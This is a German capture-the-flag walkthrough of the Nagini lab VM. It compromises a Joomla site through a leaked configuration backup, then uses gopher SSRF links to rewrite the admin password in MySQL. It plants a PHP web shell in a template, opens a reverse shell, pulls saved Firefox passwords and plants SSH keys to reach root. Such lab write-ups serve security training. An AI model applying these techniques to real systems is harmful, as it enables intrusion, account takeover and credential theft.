Zuerst wird mit arp-scan das Netzwerk gescannt, um die IP-Adresse des Ziels zu ermitteln.
ARP-Scan
192.168.2.124 08:00:27:4c:e7:08 PCS Systemtechnik GmbH
Als Nächstes wird die /etc/hosts-Datei bearbeitet, um den Hostnamen hp_nagini.vln der IP-Adresse zuzuordnen.
/etc/hosts
192.168.2.124 hp_nagini.vln
Nmap wird verwendet, um offene Ports und Dienste auf dem Zielsystem zu scannen. Die Option -Pn wird verwendet, um Host Discovery zu überspringen, falls ICMP blockiert ist. Anschließend wird die Ausgabe gefiltert, um nur die offenen Ports anzuzeigen.
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
Nmap wird erneut ausgeführt, um detailliertere Informationen zu erhalten.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 13:50 CET
Nmap scan report for hp_nagini.vln (192.168.2.124)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
22/tcp open ssh penSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:4C:E7:08 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
S CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
S details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACERUTE
HP RTT ADDRESS
1 0.14 ms hp_nagini.vln (192.168.2.124)
Nikto wird verwendet, um den Webserver auf Schwachstellen zu scannen.
- Nikto v2.5.0
+ Target IP: 192.168.2.124
+ Target Hostname: 192.168.2.124
+ Target Port: 80
+ Start Time: 2024-11-19 13:50:58 (GMT1)
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-ptions header is not present.
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 61, size: 5befef8ab2764, mtime: gzip.
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ PTINS: Allowed HTTP Methods: GET, PST, PTINS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-11-19 13:51:36 (GMT1) (38 seconds)
+ 1 host(s) tested
Gobuster wird verwendet, um weitere Verzeichnisse und Dateien zu entdecken.
http://192.168.2.124/index.html (Status: 200) [Size: 97]
http://192.168.2.124/note.txt (Status: 200) [Size: 234]
http://192.168.2.124/joomla (Status: 301) [Size: 315] [--> http://192.168.2.124/joomla/]
Der Inhalt der note.txt-Datei wird angezeigt.
----------------------------------------------------------------------------------------------------
http://192.168.2.124/note.txt
Hello developers!!
I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.
Regards,
site_amdin
----------------------------------------------------------------------------------------------------
Joomscan wird verwendet, um die Joomla-Installation zu analysieren.
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[WASP JoomScan
+++[Version : 0.0.7
+++[Update Date : [2018/09/23]
+++[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@WASP_JoomScan , @rezesp , @Ali_Razmjo0 , @WASP
Processing http://192.168.2.124/joomla/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.9.25
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.2.124/joomla/administrator/components
http://192.168.2.124/joomla/administrator/modules
http://192.168.2.124/joomla/administrator/templates
http://192.168.2.124/joomla/tmp
http://192.168.2.124/joomla/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.2.124/joomla/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.2.124/joomla/robots.txt
Interesting path found from robots.txt
http://192.168.2.124/joomla/joomla/administrator/
http://192.168.2.124/joomla/administrator/
http://192.168.2.124/joomla/bin/
http://192.168.2.124/joomla/cache/
http://192.168.2.124/joomla/cli/
http://192.168.2.124/joomla/components/
http://192.168.2.124/joomla/includes/
http://192.168.2.124/joomla/installation/
http://192.168.2.124/joomla/language/
http://192.168.2.124/joomla/layouts/
http://192.168.2.124/joomla/libraries/
http://192.168.2.124/joomla/logs/
http://192.168.2.124/joomla/modules/
http://192.168.2.124/joomla/plugins/
http://192.168.2.124/joomla/tmp/
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config file is found
----------------------------------------------------------------------------------------------------
config file path : http://192.168.2.124/joomla/configuration.php.bak
----------------------------------------------------------------------------------------------------
Your Report : reports/192.168.2.124/
Die Konfigurationsdatei wird heruntergeladen.
--2024-11-19 14:03:27-- http://192.168.2.124/joomla/configuration.php.bak
Verbindungsaufbau zu 192.168.2.124:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 K
Länge: 1978 (1,9K) [application/x-trash]
Wird in configuration.php.bak gespeichert.
configuration.php.bak 100%[=>] 1,93K --.-KB/s in 0s
2024-11-19 14:03:27 (365 MB/s) - configuration.php.bak gespeichert [1978/1978]
Der Inhalt der Konfigurationsdatei wird angezeigt.
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance. Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'Joomla CMS';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'goblin';
public $password = '';
public $db = 'joomla';
public $dbprefix = 'joomla_';
public $live_site = '';
public $secret = 'ILhwP6HTYKcN7qMh';
public $gzip = '0';
public $error_reporting = 'default';
public $mailer = 'mail';
public $mailfrom = 'site_admin@nagini.hogwarts';
public $fromname = 'Joomla CMS';
public $sendmail = '/usr/sbin/sendmail';
public $log_path = '/var/www/html/joomla/administrator/logs';
public $tmp_path = '/var/www/html/joomla/tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $shared_session = '0';
Gobuster wird verwendet, um das interne Netzwerk zu scannen.
http://nagini.hogwarts/index.html (Status: 200) [Size: 97]
http://nagini.hogwarts/internalResourceFeTcher.php (Status: 200) [Size: 362]
Der Inhalt von internalResourceFeTcher.php wird angezeigt.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/internalResourceFeTcher.php
Resource Fetching Page
>Welcome to Internal Network Resource Fetching Page
form action="/internalResourceFeTcher.php" method="GET"
Eine Datei wird auf dem eigenen Server erstellt.
Ein HTTP-Server wird gestartet, um die Datei bereitzustellen.
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Die Datei wird mit internalResourceFeTcher.php abgerufen.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/internalResourceFeTcher.php?url=http://192.168.2.199/ben.txt
Welcome to Internal Network Resource Fetching Page
hi man
----------------------------------------------------------------------------------------------------
LFI war erfolgreich
Es wird versucht, die /etc/passwd auszulesen.
root:x:0:0:root:/root:/bin/bash
snape:x:1000:1000:Snape,,,:/home/snape:/bin/bash
hermoine:x:1002:1002:/home/hermoine:/bin/bash
Gopherus wird verwendet, um einen MySQL-Exploit zu generieren.
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: goblin
Give query to execute: show databases;
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01....
--Made-by-SpyD3r--
Der generierte Gopher-Link wird verwendet, um eine Verbindung zur MySQL-Datenbank herzustellen.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/internalResourceFeTcher.php?url=gopher://127.0.0.1:3306/_%a5%00%00%01%8...
Welcome to Internal Network Resource Fetching Page
Warning: curl_setopt(): Curl option contains invalid characters (\0) in /var/www/html/internalResourceFeTcher.php on line 37
----------------------------------------------------------------------------------------------------
gopher://192.168.2.124:3306/_%a5%00%00%01%85%a6%ff%01%...
Man muss so oft auf fetch drücken bis die Ausgabe kommt...
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%0...
Welcome to Internal Network Resource Fetching Page
c 5.5.5-10.3.27-MariaDB-0+deb10u18^rB1kLx:U~:C"!{l+1S...joomla
Es wird versucht, die Datenbanktabellen aufzulisten.
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: goblin
Give query to execute: use joomla;show tables;
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%...
--Made-by-SpyD3r--
Die Datenbanktabellen werden ausgelesen.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/internalResourceFeTcher.php?url=gopher%3A%2F%2F127.0.0.1%3A3306%2F_%25a5%2500%2500%2501%2585%25a6%25ff...
Welcome to Internal Network Resource Fetching Page
c 5.5.5-10.3.27-MariaDB-0+deb10u1Cr8a`...
Der MySQL-Benutzer-Passworthash wird geändert.
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: goblin
Give query to execute: USE joomla; UPDATE joomla_users SET password='21232f297a57a5a743894a0e4a801fc3' WHERE email='site_admin@nagini.hogwarts';
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%2...
--Made-by-SpyD3r--
MySQL new Password Injection war erfolgreich.
----------------------------------------------------------------------------------------------------
MySql new Password Injection Erfolgreich
----------------------------------------------------------------------------------------------------
Welcome to Internal Network Resource Fetching Page
c 5.5.5-10.3.27-MariaDB-0+deb10u1ynazdeN7f...joomla0(Rows matched: 1 Changed: 0 Warnings: 0
Die neuen Anmeldeinformationen werden angezeigt.
----------------------------------------------------------------------------------------------------
http://nagini.hogwarts/joomla/index.php/component/users/?view=login&Itemid=101
User : PW
site_admin : admin
----------------------------------------------------------------------------------------------------
Auf die Administratorseite wird zugegriffen.
http://nagini.hogwarts/joomla/administrator/index.php
login !!!
Die Template-Datei index.php wird bearbeitet, um eine Hintertür zu erstellen.
http://nagini.hogwarts/joomla/administrator/index.php?option=com_templates&view=templates
Navbar / Extensions / templates / templates
Protostar Details and Files
--> index.php
echo system($ GET['cmd']); <<
/
* @package Joomla.Site
* @subpackage Templates.protostar
*
Save <<--
----------------------------------------------------------------------------------------------------
Message
File saved.
Der Vorlagen-Preview wird angezeigt.
Template Preview
Notice: Undefined index: cmd in /var/www/html/joomla/templates/protostar/index.php on line 2
Warning: system(): Cannot execute a blank command in /var/www/html/joomla/templates/protostar/index.php on line 2
Die Reverse Shell wird hergestellt.
http://nagini.hogwarts/joomla/templates/protostar/index.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
------------------------------------------------------------------------------------
Payload: http://nagini.hogwarts/joomla/templates/protostar/index.php?cmd=%2Fbin%2F
------------------------------------------------------------------------------------
┌──(pwn)─(root㉿CCat)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.124] 43986
bash: cannot set terminal process group (465): Inappropriate ioctl for device
bash: no job control in this shell
find / -type f -perm -4000 -ls 2>/dev/null wird verwendet, um SUID-Dateien zu finden.
www-data@Nagini:/var/www/html/joomla/templates/protostar$ find / -type f -perm -4000 -ls 2>/dev/null
3436 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
52 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
3908 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
3583 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
56 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
53 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
55 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
3910 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
12806 428 -rwsr-xr-x 1 root root 436552 Feb 1 2020 /usr/lib/openssh/ssh-keysign
9936 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135462 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
268870 144 -rwsr-xr-x 1 hermoine hermoine 146880 Apr 4 2021 /home/hermoine/bin/su_cp
Anmeldeinformationen für snape werden durchsucht.
www-data@Nagini:/home/snape$ cat .creds.txt
TG92ZUBsaWxseQ
www-data@Nagini:/home/snape$ echo TG92ZUBsaWxseQ | base64 -d
Love@lilly
Eine SSH-Verbindung zum Benutzer snape wird hergestellt.
┌──(root㉿CCat)-[~]
└─# ssh snape@192.168.2.124
snape@192.168.2.124's password:
Linux Nagini 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY N WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 16:38:35 2021 from 192.168.1.53
snape@Nagini:/home/hermoine$
Der Inhalt des Verzeichnisses /home/hermoine wird angezeigt.
snape@Nagini:/home/hermoine$ ls -a
. .. bin .gnupg horcrux2.txt .mozilla .ssh
Der Hilfebefehl für ./su_cp wird ausgeführt.
snape@Nagini:/home/hermoine/bin$ ./su_cp --help
Usage: ./su_cp [PTIN]... [-T] SURCE DEST
or: ./su_cp [PTIN]... SURCE... DIRECTRY
or: ./su_cp [PTIN]... -t DIRECTRY SURCE...
Copy SURCE to DEST, or multiple SURCE(s) to DIRECTRY.
Mandatory arguments to long options are mandatory for short options too.
-a, --archive same as -dR --preserve=all
--attributes-only don't copy the file data, just the attributes
--backup[=CNTRL] make a backup of each existing destination file
-b like --backup but does not accept an argument
--copy-contents copy contents of special files when recursive
-d same as --no-dereference --preserve=links
-f, --force if an existing destination file cannot be
opened, remove it and try again (this option
is ignored when the -n option is also used)
-i, --interactive prompt before overwrite (overrides a previous -n
option)
-H follow command-line symbolic links in SURCE
-l, --link hard link files instead of copying
-L, --dereference always follow symbolic links in SURCE
-n, --no-clobber do not overwrite an existing file (overrides
a previous -i option)
-P, --no-dereference never follow symbolic links in SURCE
-p same as --preserve=mode,ownership,timestamps
--preserve[=ATTR_LIST] preserve the specified attributes (default:
mode,ownership,timestamps), if possible
additional attributes: context, links, xattr,
all
--no-preserve=ATTR_LIST don't preserve the specified attributes
--parents use full source file name under DIRECTRY
-R, -r, --recursive copy directories recursively
--reflink[=WHEN] control clone/CoW copies. See below
--remove-destination remove each existing destination file before
attempting to open it (contrast with --force)
--sparse=WHEN control creation of sparse files. See below
--strip-trailing-slashes remove any trailing slashes from each SURCE
argument
-s, --symbolic-link make symbolic links instead of copying
-S, --suffix=SUFFIX override the usual backup suffix
-t, --target-directory=DIRECTRY copy all SURCE arguments into DIRECTRY
horcrux2.txt in den aktuellen Ordner kopiert
snape@Nagini:/home/hermoine/bin$ ./su_cp --copy-contents ../horcrux2.txt .
snape@Nagini:/home/hermoine/bin$
horcrux2.txt -Datei ausgelesen
snape@Nagini:/home/hermoine/bin$ cat horcrux2.txt
horcrux_{NDogSGVsZ2EgSHVmZmxlcHVmZidzIEN1cCBkZXN0cm95ZWQgYnkgSGVybWlvbmU=}
Base64 decodiert
snape@Nagini:/home/hermoine/bin$ echo NDogSGVsZ2EgSHVmZmxlcHVmZidzIEN1cCBkZXN0cm95ZWQgYnkgSGVybWlvbmU= | base64 -d
4: Helga Hufflepuff's Cup destroyed by Hermione
Ein HTTP-Server wird gestartet.
┌──(root㉿CCat)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
authorized_keys in /tmp kopiert
snape@Nagini:/home/hermoine/bin$ cd /tmp/
snape@Nagini:/tmp$ wget 192.168.2.199/authorized_keys
--2024-11-19 20:14:24-- http://192.168.2.199/authorized_keys
Connecting to 192.168.2.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 91 [application/octet-stream]
Saving to: ‘authorized_keys’
authorized_keys 100%[=====================================>] 91 --.-KB/s in 0s
2024-11-19 20:14:24 (37.2 MB/s) - ‘authorized_keys’ saved [91/91]
authorized_keys in .ssh kopiert
snape@Nagini:/tmp$ cd -
/home/hermoine/bin
snape@Nagini:/home/hermoine/bin$ ./su_cp --copy-contents /tmp/authorized_keys ../.ssh
snape@Nagini:/home/hermoine/bin$
SSH Hack injecion erfolgreich
Erfolgreiche SSH-Anmeldung mit hermoine.
┌──(root㉿CCat)-[~]
└─# ssh hermoine@192.168.2.124
Enter passphrase for key '/root/.ssh/id_rsa':
Linux Nagini 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY N WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 4 16:43:01 2021 from 1
hermoine@Nagini$
Der Inhalt von /opt wird angezeigt.
hermoine@Nagini$ ls -la /opt/
total 14716
drwxr-xr-x 3 root root 4096 Apr 4 2021 .
drwxr-xr-x 18 root root 4096 Apr 4 2021 ..
-rw-r--r-- 1 root root 14018704 Mar 2 2021 Joomla.zip
drwxr-xr-x 16 ron ron 4096 Apr 3 2021 nginx-1.16.1
-rw-r--r-- 1 root root 1032630 Apr 3 2021 nginx-1.16.1.tar.gz
Ein HTTP-Server wird auf Port 8000 gestartet.
hermoine@Nagini$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Joomla.zip wird heruntergeladen.
┌──(root㉿CCat)-[~]
└─# wget 192.168.2.124:8000/Joomla.zip
--2024-11-19 16:26:25-- http://192.168.2.124:8000/Joomla.zip
Verbindungsaufbau zu 192.168.2.124:8000 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 14018704 (13M) [application/zip]
Wird in Joomla.zip gespeichert.
Joomla.zip 100%[=====================================>] 13,37M --.-KB/s in 0,05s
2024-11-19 16:26:25 (248 MB/s) - Joomla.zip gespeichert [14018704/14018704]
Joomla.zip entpackt
┌──(root㉿CCat)-[~]
└─# unzip Joomla.zip
Archive: Joomla.zip
inflating: LICENSE.txt
inflating: README.txt
creating: administrator/
....
...
..
inflating: tmp/index.html
inflating: web.config.txt
horcrux1.txt wird angezeigt
hermoine@Nagini:/opt$ cat /var/www/html/horcrux1.txt
horcrux_{MzogU2x5dGhFcmlJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9}
Base64 Decodiert
hermoine@Nagini:/opt$ echo MzogU2x5dGhFcmlJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9|base64 -d
3: SlythEriN's LocKEet dEstroYeD bY RoN
firefox_decrypt wird geklont.
┌──(root㉿CCat)-[~/Hackingtools]
└─# git clone https://github.com/unode/firefox_decrypt
Klone nach 'firefox_decrypt'...
remote: Enumerating objects: 1382, done.
remote: Counting objects: 100% (500/500), done.
remote: Compressing objects: 100% (118/118), done.
remote: Total 1382 (delta 399), reused 460 (delta 377), pack-reused 882 (from 1)
Empfange bjekte: 100% (1382/1382), 481.61 KiB | 1.30 MiB/s, fertig.
Löse Unterschiede auf: 100% (873/873), fertig.
Privilege Escalation
Privilege Escalation
3: SlythEriN's LocKEet dEstroYeD bY RoN
Der Inhalt des Basisverzeichnisses hermoine wird angezeigt.
hermoine@Nagini:/opt$ cd ~
hermoine@Nagini$ ls -la
total 28
drwxr-xr-x 6 hermoine hermoine 4096 Apr 4 2021 .
drwxr-xr-x 4 root root 4096 Apr 4 2021 ..
drwxr-xr-x 2 hermoine hermoine 4096 Nov 19 20:08 bin
drwx 3 hermoine hermoine 4096 Apr 4 2021 .gnupg
-r--r-- 1 hermoine hermoine 75 Apr 4 2021 horcrux2.txt
drwx 5 hermoine hermoine 4096 Jun 1 2019 .mozilla
drwxr-xr-x 2 hermoine hermoine 4096 Nov 19 20:15 .ssh
Der Inhalt des Mozilla-Verzeichnisses wird angezeigt.
hermoine@Nagini/.mozilla$ ls -la
total 20
drwx 5 hermoine hermoine 4096 Jun 1 2019 .
drwxr-xr-x 6 hermoine hermoine 4096 Apr 4 2021 ..
drwx 2 hermoine hermoine 4096 Jun 1 2019 extensions
drwx 5 hermoine hermoine 4096 Jun 1 2019 firefox
drwx 2 hermoine hermoine 4096 Jun 1 2019 systemextensionsdev
Firefox-Anmeldeinformationen werden extrahiert.
┌──(root㉿CCat)-[~/jojo/192.168.2.124:8000]
└─# wget -r 192.168.2.124:8000/
┌──(root㉿CCat)-[~/Hackingtools/firefox_decrypt]
└─# python3 firefox_decrypt.py /root/jojo/192.168.2.124:8000
2024-11-19 16:58:15,714 - WARNING - profile.ini not found in /root/jojo/192.168.2.124:8000
2024-11-19 16:58:15,715 - WARNING - Continuing and assuming '/root/jojo/192.168.2.124:8000' is a profile location
Website: http://nagini.hogwarts
Username: 'root'
Password: '@Alohomora#123'
Su zu Root wird ausgeführt.
snape@Nagini:/home/hermoine/bin$ su root
Password:
root@Nagini:/home/hermoine/bin# id
uid=0(root) gid=0(root) groups=0(root)
horcrux3.txt wird angezeigt
root@Nagini:/home/hermoine/bin# cd ~
root@Nagini: ls
horcrux3.txt
root@Nagini: cat horcrux3.txt
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/
Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Medium
Machine Name: Nagini
Horcruxes Hidden in this VM: 3 horcruxes
You have successfully pwned Nagini machine.
Here is your third hocrux: horcrux_{NTogRGlhZGVtIG9mIFJhdmVuY2xhdyBkZXN0cm95ZWQgYnkgSGFycnk=}
Privilege Escalation erfolgreich
Flags
Flags
cat /home/hermoine/bin/horcrux2.txt
4: Helga Hufflepuff's Cup destroyed by Hermione>
cat root.txt
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/
Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Medium
Machine Name: Nagini
Horcruxes Hidden in this VM: 3 horcruxes
You have successfully pwned Nagini machine.
Here is your third hocrux: horcrux_{NTogRGlhZGVtIG9mIFJhdmVuY2xhdyBkZXN0cm95ZWQgYnkgSGFycnk=}
# For any queries/suggestions feel free to ping me at email: time4ster@protonmail.com